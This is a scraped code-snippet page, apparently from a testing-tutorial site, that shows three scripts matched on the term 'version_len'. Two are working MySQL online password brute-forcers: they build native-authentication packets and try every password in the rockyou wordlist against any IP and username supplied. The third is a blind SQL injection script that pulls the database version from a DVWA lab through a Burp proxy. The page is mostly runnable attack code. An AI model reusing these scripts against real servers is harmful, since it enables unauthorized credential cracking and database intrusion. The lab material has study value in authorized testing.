How to use version_len method in autotest

Best Python code snippet using autotest_python

mysqlcheckMemMapMutiThread.py

Source:mysqlcheckMemMapMutiThread.py Github

copy

Full Screen

1# Python3 compatible2# Mysql password cracker, works with Secure Password Authentication algorithm3# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html4# Nov 20205# Author: Ivica Stipovic6# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file7# If you do, any connect attempt will return OK server response / will allow anonymous access8# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module910import socket11import sys12import time13import timeit14import struct15from hashlib import sha116import mmap17import threading1819pass_found=02021def calculation(username_binary, TCP_IP,TCP_PORT):22 23#Iterate through the passwords, make hash out of each one24# The biggest issue is that network sockets don't fit with CUDA - Device IO communication is not managed by CUDA25# Network sockets probably require multithreading with CPU26 27 dbversion=02829 for line in iter(m.readline,b""):3031 sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)32 sock.connect((TCP_IP,TCP_PORT))33 version,addr=sock.recvfrom(1024)34 35 payload_len=version[0]36 ver_offset=537 version_len=038 a=039 40 while(version[a+ver_offset]!=0):41 version_len+=142 a+=14344 if dbversion==0:45 print ("[+] Database version =", version[5:5+version_len].decode('utf-8'))46 dbversion=14748# You must calculate the version string length to get to salts49# move to 6th byte of the response and loop until first \00 terminator50# Count the bytes and calculate len of the Version field5152 salt1=version[10+version_len:18+version_len] # -1 to cut off null terminator53 salt2=version[37+version_len:49+version_len] # -1 to cut off null terminator5455 salt=salt1+salt256 salt3=bytearray()57 salt3.extend(salt)58 59 line2=line.rstrip()60 61 datalen=int(55+len(username_binary))62 datalen2=datalen.to_bytes(3,'little') 6364# hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes65 bytes1 = sha1(line2).digest()66 67 concat1 = salt368 concat2 = sha1(sha1(line2).digest()).digest()69 70 bytes3=bytearray()71 concat=concat1+concat272 bytes3.extend(concat)73 bytes3=sha1(bytes3).digest()74 75 hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))76 pass_hash=hash77 78 data=datalen2 # Ensure length field is 3 bytes (hence +\x00\x00)79 data +=b'\x01' # packet number=180 data +=b'\x0d\xa2' # Client capabilities -> careful with that!!81 data +=b'\x00\x00' # Extended capabilities=082 data +=b'\x00\x00\x00\x40' # Max size83 data +=b'\x08' # Charset=8 latin184 data +=b'\x00' *23 # 23 bytes are reserved=085 data +=username_binary # Username (from input parameter) with 00 termination 86 data +=b'\x00' # Username NULL terminator87 data +=b'\x14' # Not documented and wireshaek has no idea what this is!!88 data +=pass_hash89 data +=b'\x00'9091 sock.sendall(data)92 authcode,addr=sock.recvfrom(1024)93 94 if authcode[5]==0:95 print ("[+] Password found:",line2)96 sock.close()97 98 sock.close()99100 101# End of function/subroutine102103if len(sys.argv)!=3:104105 print ("Usage: python {} <ip address> <username>".format(sys.argv[0]))106 sys.exit()107108TCP_IP =sys.argv[1]109username =sys.argv[2]110username_binary =username.encode('utf-8')111TCP_PORT =3306112data_calculated=b""113114start = timeit.default_timer()115116# we're doing memory mapped file search to speed up stuff117# Start of the subroutine/function118119with open("rockyou2.txt","rb") as f:120 m=mmap.mmap(f.fileno(),length=0,access=mmap.ACCESS_READ) 121 passx=m.readline().rstrip()122123#Multithreading124 t1=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))125 t2=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))126 127 t1.start()128 t2.start()129130#Wait for threads to finish131 132 t1.join()133 t2.join()134 stop = timeit.default_timer()135 execution_time = stop - start136137 print("[+] Program Executed in "+str(execution_time))138 139 140141142143 ...

Full Screen

Full Screen

mysqlcheck4.py

Source:mysqlcheck4.py Github

copy

Full Screen

1# Python3 compatible2# Mysql password cracker, works with Secure Password Authentication algorithm3# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html4# Nov 20205# Author: Ivica Stipovic6# Sidenote: make sure you do not have "skip-grant-tables" in your my mySql config file7# If you do, any connect attempt will return OK server response / will allow anonymous access8# This code is functionally relative close to the Metasploit auxiliary/scanner/mysql_login module910import socket11import sys12import time13import struct14from hashlib import sha11516if len(sys.argv)!=3:1718 print ("Usage: python mysqlcheck.py <ip address> <username>")19 sys.exit()2021TCP_IP =sys.argv[1]22username =sys.argv[2]23username_binary =username.encode('utf-8')24TCP_PORT =33062526f=open("rockyou2.txt","r") 2728passx=f.readlines() 2930#Iterate through the passwords, make hash out of each one31dbversion=03233for line in passx:3435 sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)36 sock.connect((TCP_IP,TCP_PORT))37 version,addr=sock.recvfrom(1024)38 39 payload_len=version[0]40 ver_offset=541 version_len=042 a=04344 while(version[a+ver_offset]!=0):45 version_len+=146 a+=14748 if dbversion==0:49 print ("Database version =", version[5:5+version_len].decode('utf-8'))50 dbversion=15152# You must calculate the version string length to get to salts53# move to 6th byte of the response and loop until first \00 terminator54# Count the bytes and calculate len of the Version field5556 salt1=version[10+version_len:18+version_len] # -1 to cut off null terminator57 salt2=version[37+version_len:49+version_len] # -1 to cut off null terminator5859 salt=salt1+salt260 salt3=bytearray()61 salt3.extend(salt)62 63 line2=line.rstrip()6465 datalen=int(55+len(username_binary))66 datalen2=datalen.to_bytes(3,'little') 6768# hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes69 bytes1 = sha1(line2.encode('utf-8')).digest()70 71 concat1 = salt372 concat2 = sha1(sha1(line2.encode('utf-8')).digest()).digest()73 74 bytes3=bytearray()75 concat=concat1+concat276 bytes3.extend(concat)77 bytes3=sha1(bytes3).digest()78 79 hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))80 pass_hash=hash81 82 data=datalen2 # Ensure length field is 3 bytes (hence +\x00\x00)83 data +=b'\x01' # packet number=184 data +=b'\x0d\xa2' # Client capabilities -> careful with that!!85 data +=b'\x00\x00' # Extended capabilities=086 data +=b'\x00\x00\x00\x40' # Max size87 data +=b'\x08' # Charset=8 latin188 data +=b'\x00' *23 # 23 bytes are reserved=089 data +=username_binary # Username (from input parameter) with 00 termination 90 data +=b'\x00' # Username NULL terminator91 data +=b'\x14' # Not documented and wireshaek has no idea what this is!!92 data +=pass_hash93 data +=b'\x00'94 95 sock.sendall(data)96 authcode,addr=sock.recvfrom(1024)9798 99 if (authcode[5]==21 and authcode[6])==4: #Error code for "access denied"100 print ("Access denied for password:",line2)101 else:102 if authcode[5]==0:103 print ("Password found:",line2) ...

Full Screen

Full Screen

sqli_blind_medium.py

Source:sqli_blind_medium.py Github

copy

Full Screen

...3import urllib4LIMIT = 1005PHPSESSID = "vj4j0b0s5vo65mdd54ohullaq4"6SECURITY = "medium"7def get_db_version_len():8 version_len = 09 while True:10 version_len += 111 url = f"http://localhost/vulnerabilities/sqli_blind/"12 header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",13 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",14 "Accept-Encoding": "gzip, deflate",15 "Accept-Language": "en-US,en;q=0.9",16 "Connection": "close",17 "Upgrade-Insecure-Requests": "1"}18 19 burp_proxy = {"http": "http://127.0.0.1:8080",20 "https": "https://127.0.0.1:8080"21 }22 burp_data = {"id": f"1 and length(@@VERSION)={version_len}",23 "Submit": "Submit"}24 25 cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}26 response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)27 28 html_doc = response.content.decode()29 soup = BeautifulSoup(html_doc, 'html.parser')30 if soup.pre.text == "User ID exists in the database.":31 return version_len32 if version_len >= 100:33 raise ValueError(f'Tried {version_len} time but table len not found') 34 35def get_db_ver_char_ascii(digit):36 target_ascii = 037 while True:38 target_ascii += 139 url = f"http://localhost/vulnerabilities/sqli_blind/"40 header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",41 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",42 "Accept-Encoding": "gzip, deflate",43 "Accept-Language": "en-US,en;q=0.9",44 "Connection": "close",45 "Upgrade-Insecure-Requests": "1"}46 47 burp_proxy = {"http": "http://127.0.0.1:8080",48 "https": "https://127.0.0.1:8080"49 }50 burp_data = {"id": f"1 and ascii(substr(@@VERSION,{digit},1))={target_ascii}",51 "Submit": "Submit"}52 53 cookies = {"PHPSESSID":PHPSESSID, "security":SECURITY}54 response = requests.post(url, data=burp_data, cookies=cookies, headers=header, proxies=burp_proxy)55 56 html_doc = response.content.decode()57 soup = BeautifulSoup(html_doc, 'html.parser')58 if soup.pre.text == "User ID exists in the database.":59 return chr(target_ascii)60 if target_ascii > 127:61 raise ValueError(f'char not found on {digit}')62def get_db_ver(name_len):63 table_name = ""64 for idx in range(1, name_len + 1):65 table_name += get_db_ver_char_ascii(idx)66 return table_name67if __name__ == "__main__":68 db_version_len = get_db_version_len()69 print(db_version_len)70 db_version = get_db_ver(db_version_len)71 print(db_version)72 ...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run autotest automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful